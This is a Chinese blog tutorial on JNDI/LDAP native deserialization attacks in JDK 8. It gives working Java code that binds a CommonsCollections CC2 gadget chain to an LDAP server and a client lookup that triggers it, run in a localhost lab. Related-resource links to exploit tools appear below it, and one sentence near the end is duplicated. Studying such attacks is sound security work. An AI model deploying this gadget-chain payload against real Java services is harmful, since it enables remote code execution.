JNDI-反序列化

于 2024-07-31 09:24:07 发布
阅读量249 收藏 7
点赞数 6
分类专栏: JNDI注入 文章标签: Java反序列化 JNDI LDAP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45436292/article/details/140813864
版权

参考博客:

JNDI注入与动态类加载

分析版本

jdk8u201

流程分析

在前面JNDI-ldap绕过分析中提到,存在ldap原生反序列化利用点。

再回顾一下,在deserializeObject

private static Object deserializeObject(byte[] var0, ClassLoader var1) throws NamingException { //var1=AppClassLoader,修复之后在本地加载
    try {
        ByteArrayInputStream var2 = new ByteArrayInputStream(var0);

        try {
            Object var20 = var1 == null ? new ObjectInputStream(var2) : new Obj.LoaderInputStream(var2, var1); 
            Throwable var21 = null;

            Object var5;
            try {
                var5 = ((ObjectInputStream)var20).readObject();  //原生反序列化
            } catch (Throwable var16) {
//....

原生反序列化可以直接打,不需要Reference。

攻击实现

我们模拟一下受害方是存在CC利用链的,所以现在项目中添加依赖

<dependencies>
    <dependency>
        <groupId>commons-collections</groupId>
        <artifactId>commons-collections</artifactId>
        <version>3.2.1</version>
    </dependency>
    <dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-collections4</artifactId>
        <version>4.0</version>
    </dependency>
</dependencies>

打下CC2

重写一个Ldap的绑定

public class JNDILDAPServerBypass {
    public static void main(String[] args) throws Exception {
        InitialContext initialContext = new InitialContext();
        //Reference refObj = new Reference("Test", "Test", "http://localhost:4444/");
        initialContext.rebind("ldap://localhost:10389/cn=Evil,dc=example,dc=com", getEvilPriorityQueue());

    }

    public static PriorityQueue getEvilPriorityQueue() throws Exception {
        //CC2
        byte[] code = Files.readAllBytes(Paths.get("G:\\Java反序列化\\class_test\\Test.class"));
        byte[][] codes = {code};
        TemplatesImpl templates = new TemplatesImpl();
        Class templatesClass = templates.getClass();
        Field name = templatesClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates, "pass");

        Field bytecodes = templatesClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates, codes);

        Field tfactory = templatesClass.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates, new TransformerFactoryImpl());


        InvokerTransformer<Object, Object> invokerTransformer = new InvokerTransformer<>("newTransformer", null, null);

        //chainedTransformer.transform(1);

        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1)); //改为ConstantTransformer,把利用链断掉
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);

        priorityQueue.add(templates);
        priorityQueue.add(1);

        ///Class transformingComparatorClass = TransformingComparator.class;  //也可以
        Class transformingComparatorClass = transformingComparator.getClass();
        Field transformer = transformingComparatorClass.getDeclaredField("transformer");
        transformer.setAccessible(true);
        transformer.set(transformingComparator, invokerTransformer);

        return priorityQueue;
    }

}

看下Ldap服务器

image-20240730181129112

之后模拟受害方客户端请求

public class JNDILDAPClient {
    public static void main(String[] args) throws Exception {
        InitialContext initialContext = new InitialContext();
        initialContext.lookup("ldap://localhost:10389/cn=Evil,dc=example,dc=com");
        //LdapCtx

    }
}

攻击成功

image-20240730181311044

分析上面代码时,也分析到了decodeReference(var0, var2);调用了,deserializeObject方法也会产生反序列化漏洞

修复

  1. 关于deserializeObject的修复,提供了个类之前trustURLCodebase属性开关,但是默认开启,不影响
    rence(var0, var2);`调用了,deserializeObject方法也会产生反序列化漏洞**
y06_z
关注
  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JNDI-Inject-Exploit
11-04
> 本工具用于解决 Fastjson、log4j2、原生JNDI注入等场景中针对高版本JDK无法加载远程恶意类,通过LDAP服务器返回原生Java反序列化数据,受害者(客户端)在具备反序列化Gadget依赖的情况下可达到命令执行、代码执行...
weblogic CVE-2018-3191 exp(含weblogic-spring-jndi-10.3.6.0.jar)
07-05
自用CVE-2018-3191 weblogic反序列化exp。
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
S24-C3P0反序列化1
08-03
S24-C3P0反序列化1 S24-C3P0反序列化是指利用C3P0结合ROME二次反序列化注入内存马的漏洞攻击方法。该攻击方法主要利用fastjson的反序列化漏洞,结合C3P0和ROME的反序列化机制,实现远程代码执行的攻击。 在了解S24...
JNDI加载RMIServer,对FastJson的反序列化攻击,.zip
09-30
这个压缩包文件的标题“JNDI加载RMIServer,对FastJson的反序列化攻击”揭示了一个常见的安全漏洞,即FastJson的反序列化漏洞。让我们深入探讨这个话题。 首先,JNDIJava Naming and Directory Interface)是一种...
开题报告电影票订票APP的设计与实现 已通过开题答辩的.doc
07-30
近些年的电影在人们文娱活动中占据重要地位,另外,由于人们的生活越来越富有,越来越多的人们不再选择在家里看电影,而是选择去电影院看电影。但是,以往的售票方式是需要工作人员一张张的录入到账户薄中的,这一模式已不再适应现在的实际情况,因为手动的操作不仅繁琐还容易存在差错。随着电子商务的发展,网络购票已经成为一种趋势,电子影票也已经慢慢走入人们的生活。目前,网票网作为国内首家全国性的网上选座购买电影票平台完全实现网上/手机查看影讯、自助选座、网银支付、自助验票全自助化营运模式。
Magene_C506_1722330141_905661_1722351868.fit
最新发布
07-30
Magene_C506_1722330141_905661_1722351868.fit
麻雀搜索算法SSA-CNN-BiLSTM-Mutilhead-Attention多变量时序预测含源码 5631.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-BiLSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-BiLSTM-Mutilhead-Attention回归预测
开题报告 二手手机收售系统【答辩高分内容】.doc
07-30
当换手机变成如“女人换衣服”般的容易,你被换下的那款二手手机究竟流向何处,才能释放其最大经济价值?某环保组织曾批露一组数据——每年,中国都会产生230万吨电子垃圾,仅次于美国的300万吨,是世界第二大电子垃圾生产国,并且还以年均20%的速度增加。另外据不完全统计,目前全国仅闲置手机就有10亿多部,并且每年新增3至5亿部。机遇与危机并存 据统计,我国手机用户数量现已达11.46亿。仅去年一年,全国就销售4.25亿部新手机,同时有近4亿部手机被淘汰。在这个手机更新换代比眨眼还快的年代,我国旧手机的回收和无害化处理措施却没能跟上,不少淘汰下来的旧手机都面临“无处可去”的尴尬。
KeePass密码管理器
07-30
KeePass是一个开源的密码管理器,它允许用户存储和管理他们的密码、证书、银行账户、信用卡信息等敏感数据。以下是一些关于KeePass的要点: 安全性:KeePass使用强大的加密算法来保护存储的数据,例如AES或Twofish。这意味着只有知道主密码或拥有主密钥文件的用户才能访问数据库。 跨平台:KeePass有多个版本,包括KeePass 2.x(适用于Windows)和KeePassXC(适用于Linux和macOS),它们都可以免费使用。 数据库:KeePass使用自己的数据库格式来存储密码,这使得用户可以创建复杂的数据库结构,包括分组、子分组和标签。 便携性:KeePass数据库可以存储在任何地方,包括U盘或云存储服务,使得用户可以随时随地访问他们的密码。 自动填充:KeePass可以集成到大多数现代浏览器中,自动填充登录表单,减少手动输入密码的需求。 密码生成器:KeePass内置了密码生成器,可以生成强大且难以猜测的密码。
车牌识别matlab源程序本例演示了如何用matlab进行图像识别,适合对matlab
07-30
车牌识别matlab源程序本例演示了如何用matlab进行图像识别,适合对matlab和图像处理有一定基础的爱好者学习。br将文件放于matlab目录下work文件夹中运行_rezip1
前后端分离项目自动化一键部署
07-30
前后端分离项目自动化一键部署
开题报告 二手书平台管理系统的设计与实现【答辩高分内容】.doc
07-30
伴着时代的进步,互联网的潮流越来越大,现在有很多平台都是卖二手书物品的,平台间的竞争也十分的激烈。但是在大学校园中确是没有那么难以发展的,如今通过观察,基本上没有哪个高校有校内的二手书交易平台,所以这个发展空间还是很大的。许多有用的书籍被轻易的丢掉,这是一种浪费行为。 以往的二手书交易市场比如经常开办的跳蚤市场,其实很不便利。会受到诸多因素的限制,比如天气,如果天气条件恶劣,那么线下的交易市场就无法开展。如果恰好这时有同学有很紧急的需求,那么就会给学生带来不便。而且现在疫情期间是不允许群众聚集的,这也会带来不便。对于毕业生而言这种买卖的需求更加频繁,毕业离校有很多东西不方便携带,丢掉又感到可惜。那么建立一个二手书交易平台就是个很不错的选择。
多线程与多进程:Python并行编程的双刃剑
07-30
Python是一种广泛使用的高级编程语言,由Guido van Rossum于1989年底发明,第一个公开发行版发行于1991年。Python的设计哲学强调代码的可读性和简洁的语法(尤其是使用空格缩进来区分代码块,而不是使用大括号或关键词)。这使得Python被认为是一种易于学习的语言,同时具备强大的功能,适合初学者和经验丰富的程序员。 Python的主要特点包括: 1. **易于学习**:Python有相对较少的关键字,结构简单,和一个明确定义的语法。 2. **易于阅读**:Python代码定义的清晰度使得它像可执行伪代码。 3. **易于维护**:Python的成功在于它的源代码是相当容易维护的。 4. **广泛的标准库**:Python的标凑库很庞大,包含用于互联网通信、网络通信、数据压缩、加密、系统管理等的模块。 5. **跨平台**:Python可以在多种操作系统上运行,包括但不限于Windows、Mac OS X、Linux等。 6. **解释型语言**:Python是一种解释型语言,这意味着开发过程中没有编译步骤。 7. **动态类型系统**:Python不会在编写
亲测修复版Thinkphp仿素材火整站源码+会员系统+虚拟产品购买
07-30
修复版Thinkphp仿素材火整站源码+会员系统+虚拟产品购买 亲测安装没问题 程序安装说明: 1、新建一个数据库 2、打开/App/Common/Conf/db.php,修改成您自己数据库的用户名和密码。 3、导入根目录下的数据库文件 4、如果是Linux系统必须把/App/Runtime、/App/Html、/uploads这三个目录和/page.config.php、/sitemap.xml、/sitemap_baidu.xml、/rss.xml的权限设置为777,否则无法使用! 5、后台登录地址:http://你的域名/code_admin.php 6、默认用户名和密码:admin 123456
面向对象超市管理系统MVC、JSON、HTML5、CSS3、JavaScript、JQuery
07-30
超市订单管理系统,本项目是基于PC端的,主要采用MVC、JSON、HTML5、CSS3、JavaScript、JQuery等相关技术,实现了登录注册信息管理、用户信息管理、订单信息管理等功能,本项目目的是为了超市能方便高效地对用户信息以及订单信息订单进行全方位的管理,能清楚的查看用户及订单的信息,并对用户及订单信息进行增删查改,最后实现超市高效管理的效果。
PHP京东图床外链上传源码 瀑布流图片展示
07-30
PHP京东图床外链上传+瀑布流图片展示源码 安装说明: 图片上传目录 域名/upload.php 例如 a.com/upload.php 上传文件到根目录解压,导入数据库文件到数据库,修改好config.php的配置信息
源代码-xls转txt等工具集 v1.2.zip
07-30
源代码-xls转txt等工具集 v1.2.zip
basic-string.h
07-30
是一个C++标准库的头文件,支持sort函数等等 std::basic_string C++ 字符串库 std::basic_string 定义于头文件 <string> template< class CharT, class Traits = std::char_traits<CharT>, class Allocator = std::allocator<CharT> > class basic_string; (1) namespace pmr { template <class CharT, class Traits = std::char_traits<CharT>> using basic_string = std::basic_string< CharT, Traits, std::polymorphic_allocator<CharT>> } (2) (C++17 起) 类模板 basic_string 存储并操纵作为非数组平凡标准布局
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值